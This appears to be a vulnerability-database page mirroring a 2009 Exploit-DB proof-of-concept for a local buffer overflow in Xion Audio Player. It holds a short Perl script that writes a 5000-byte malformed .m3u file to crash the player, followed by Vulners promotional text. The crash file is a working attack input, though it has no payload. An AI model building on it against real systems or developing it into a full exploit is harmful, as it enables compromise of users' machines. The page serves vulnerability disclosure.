Lucene search
+L

Xion Audio Player 1.0 121 - '.m3u' Local Buffer Overflow (2)

🗓️ 16 Oct 2009 00:00:00Reported by Dragon RiderType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 44 Views

Xion Audio Player 1.0 121 '.m3u' Local Buffer Overflow (2) Po

Code
#!/usr/bin/perl
#=====================================
#Xion Audio Player(.m3u File) Local buffer Overflow PoC
#download:http://www.brothersoft.com/xion-audio-player-download-49404.html
#=====================================
#Author:Dragon Rider
#contact:drag0n.rider(at)hotmail.com
#=====================================
#tested on WinXp SP3

my $crash = "\x41" x 5000;
open(myfile,'>>DragonR.m3u');
print myfile $crash;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Jun 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
44